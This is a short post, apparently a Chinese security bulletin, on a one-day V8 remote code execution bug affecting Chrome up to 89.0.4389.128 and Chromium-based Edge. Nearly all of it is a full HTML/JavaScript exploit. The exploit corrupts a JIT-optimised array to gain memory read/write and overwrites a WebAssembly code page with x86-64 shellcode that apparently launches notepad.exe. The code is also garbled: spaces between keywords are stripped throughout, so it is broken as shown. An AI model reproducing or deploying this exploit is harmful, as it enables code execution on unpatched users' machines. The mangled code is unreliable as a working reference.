[HW漏洞] Chrome 1 day V8引擎远程代码执行(新)


影响范围

Google Chrome <= 89.0.4389.128

基于Chromium内核的Microsoft Edge <= 89.0.774.76

其他基于V8引擎的浏览器

HTML 文件

<script>
    functiongc(){
    for(vari=0;i<0x80000;++i){
    vara=newArrayBuffer();
    }
    }
    letshellcode=[0xFC,0x48,0x83,0xE4,0xF0,0xE8,0xC0,0x00,0x00,0x00,0x41,0x51,0x41,0x50,0x52,0x51,
    0x56,0x48,0x31,0xD2,0x65,0x48,0x8B,0x52,0x60,0x48,0x8B,0x52,0x18,0x48,0x8B,0x52,
    0x20,0x48,0x8B,0x72,0x50,0x48,0x0F,0xB7,0x4A,0x4A,0x4D,0x31,0xC9,0x48,0x31,0xC0,
    0xAC,0x3C,0x61,0x7C,0x02,0x2C,0x20,0x41,0xC1,0xC9,0x0D,0x41,0x01,0xC1,0xE2,0xED,
    0x52,0x41,0x51,0x48,0x8B,0x52,0x20,0x8B,0x42,0x3C,0x48,0x01,0xD0,0x8B,0x80,0x88,
    0x00,0x00,0x00,0x48,0x85,0xC0,0x74,0x67,0x48,0x01,0xD0,0x50,0x8B,0x48,0x18,0x44,
    0x8B,0x40,0x20,0x49,0x01,0xD0,0xE3,0x56,0x48,0xFF,0xC9,0x41,0x8B,0x34,0x88,0x48,
    0x01,0xD6,0x4D,0x31,0xC9,0x48,0x31,0xC0,0xAC,0x41,0xC1,0xC9,0x0D,0x41,0x01,0xC1,
    0x38,0xE0,0x75,0xF1,0x4C,0x03,0x4C,0x24,0x08,0x45,0x39,0xD1,0x75,0xD8,0x58,0x44,
    0x8B,0x40,0x24,0x49,0x01,0xD0,0x66,0x41,0x8B,0x0C,0x48,0x44,0x8B,0x40,0x1C,0x49,
    0x01,0xD0,0x41,0x8B,0x04,0x88,0x48,0x01,0xD0,0x41,0x58,0x41,0x58,0x5E,0x59,0x5A,
    0x41,0x58,0x41,0x59,0x41,0x5A,0x48,0x83,0xEC,0x20,0x41,0x52,0xFF,0xE0,0x58,0x41,
    0x59,0x5A,0x48,0x8B,0x12,0xE9,0x57,0xFF,0xFF,0xFF,0x5D,0x48,0xBA,0x01,0x00,0x00,
    0x00,0x00,0x00,0x00,0x00,0x48,0x8D,0x8D,0x01,0x01,0x00,0x00,0x41,0xBA,0x31,0x8B,
    0x6F,0x87,0xFF,0xD5,0xBB,0xF0,0xB5,0xA2,0x56,0x41,0xBA,0xA6,0x95,0xBD,0x9D,0xFF,
    0xD5,0x48,0x83,0xC4,0x28,0x3C,0x06,0x7C,0x0A,0x80,0xFB,0xE0,0x75,0x05,0xBB,0x47,
    0x13,0x72,0x6F,0x6A,0x00,0x59,0x41,0x89,0xDA,0xFF,0xD5,0x6E,0x6F,0x74,0x65,0x70,
    0x61,0x64,0x2E,0x65,0x78,0x65,0x00];
    varwasmCode=newUint8Array([0,97,115,109,1,0,0,0,1,133,128,128,128,0,1,96,0,1,127,3,130,128,128,128,0,1,0,4,132,128,128,128,0,1,112,0,0,5,131,128,128,128,0,1,0,1,6,129,128,128,128,0,0,7,145,128,128,128,0,2,6,109,101,109,111,114,121,2,0,4,109,97,105,110,0,0,10,138,128,128,128,0,1,132,128,128,128,0,0,65,42,11]);
    varwasmModule=newWebAssembly.Module(wasmCode);
    varwasmInstance=newWebAssembly.Instance(wasmModule);
    varmain=wasmInstance.exports.main;
    varbf=newArrayBuffer(8);
    varbfView=newDataView(bf);
    functionfLow(f){
    bfView.setFloat64(0,f,true);
    return(bfView.getUint32(0,true));
    }
    functionfHi(f){
    bfView.setFloat64(0,f,true);
    return(bfView.getUint32(4,true))
    }
    functioni2f(low,hi){
    bfView.setUint32(0,low,true);
    bfView.setUint32(4,hi,true);
    returnbfView.getFloat64(0,true);
    }
    functionf2big(f){
    bfView.setFloat64(0,f,true);
    returnbfView.getBigUint64(0,true);
    }
    functionbig2f(b){
    bfView.setBigUint64(0,b,true);
    returnbfView.getFloat64(0,true);
    }
    classLeakArrayBufferextendsArrayBuffer{
    constructor(size){
    super(size);
    this.slot=0xb33f;
    }
    }
    functionfoo(a){
    letx=-1;
    if(a)x=0xFFFFFFFF;
    vararr=newArray(Math.sign(0-Math.max(0,x,-1)));
    arr.shift();
    letlocal_arr=Array(2);
    local_arr[0]=5.1;//4014666666666666
    letbuff=newLeakArrayBuffer(0x1000);//byteLength idx=8
    arr[0]=0x1122;
    return[arr,local_arr,buff];
    }
    for(vari=0;i<0x10000;++i)
    foo(false);
    gc();gc();
    [corrput_arr,rwarr,corrupt_buff]=foo(true);
    corrput_arr[12]=0x22444;
    deletecorrput_arr;
    functionsetbackingStore(hi,low){
    rwarr[4]=i2f(fLow(rwarr[4]),hi);
    rwarr[5]=i2f(low,fHi(rwarr[5]));
    }
    functionleakObjLow(o){
    corrupt_buff.slot=o;
    return(fLow(rwarr[9])-1);
    }
    letcorrupt_view=newDataView(corrupt_buff);
    letcorrupt_buffer_ptr_low=leakObjLow(corrupt_buff);
    letidx0Addr=corrupt_buffer_ptr_low-0x10;
    letbaseAddr=(corrupt_buffer_ptr_low&0xffff0000)-((corrupt_buffer_ptr_low&0xffff0000)%0x40000)+0x40000;
    letdelta=baseAddr+0x1c-idx0Addr;
    if((delta%8)==0){
    letbaseIdx=delta/8;
    this.base=fLow(rwarr[baseIdx]);
    }else{
    letbaseIdx=((delta-(delta%8))/8);
    this.base=fHi(rwarr[baseIdx]);
    }
    letwasmInsAddr=leakObjLow(wasmInstance);
    setbackingStore(wasmInsAddr,this.base);
    letcode_entry=corrupt_view.getFloat64(13*8,true);
    setbackingStore(fLow(code_entry),fHi(code_entry));
    for(leti=0;i<shellcode.length;i++){
    corrupt_view.setUint8(i,shellcode[i]);
    }
    main();
    </script>

 
